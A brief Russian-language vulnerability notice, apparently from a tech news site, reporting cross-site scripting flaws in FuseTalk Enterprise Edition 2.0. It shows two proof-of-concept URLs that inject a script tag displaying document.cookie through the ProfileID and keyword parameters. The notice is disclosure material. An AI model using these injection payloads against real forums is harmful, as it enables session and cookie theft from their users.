В FuseTalk Enterprise Edition Version 2.0 (возможно и в
других версиях) обнаружен ряд уязвимостей:

http://example.com/forum/tombstone.cfm? ProfileID=<script>alert(document.cookie)</script>

http://example.com/forum/usersearchresults.cfm? keyword=<script>alert(document.cookie)</script>
&FT_ACTION=SearchUsers

 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии